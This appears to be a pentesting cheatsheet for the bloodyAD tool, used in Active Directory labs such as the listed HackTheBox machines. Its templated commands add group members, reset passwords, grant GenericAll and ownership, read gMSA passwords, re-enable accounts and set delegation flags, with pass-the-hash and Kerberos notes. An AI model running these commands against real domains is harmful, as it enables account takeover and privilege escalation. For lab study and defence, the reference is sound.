BloodyAD Cheatsheet

Retrieve User Information

bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username

Add User To Group

bloodyAD --host $dc -d $domain -u $username -p $password add groupMember $group_name $member_to_add

Change Password

bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_password

Give User GenericAll Rights

bloodyAD --host $dc -d $domain -u $username -p $password add genericAll $DN $target_username

WriteOwner

bloodyAD --host $dc -d $domain -u $username -p $password set owner $target_group $target_username

ReadGMSAPassword

bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username --attr msDS-ManagedPassword

Enable a Disabled Account

bloodyAD --host $dc -d $domain -u $username -p $password remove uac $target_username -f ACCOUNTDISABLE

Add The TRUSTED_TO_AUTH_FOR_DELEGATION Flag

bloodyAD --host $dc -d $domain -u $username -p $password add uac $target_username -f TRUSTED_TO_AUTH_FOR_DELEGATION

Notes

To use Kerberos, obtain a TGT and then pass -k instead of providing a username and password
You can pass a hash instead of the password

Resources

https://github.com/CravateRouge/bloodyAD/wiki/User-Guide
https://0xdf.gitlab.io/2024/03/30/htb-rebound.html
https://www.thehacker.recipes/

Machines To Practice

Redelegate (Vulnlab)
Vintage (HackTheBox)
Infiltrator (HackTheBox)
Rebound (HackTheBox)
Absolute (HackTheBox)
Certified (HackTheBox)

Back to top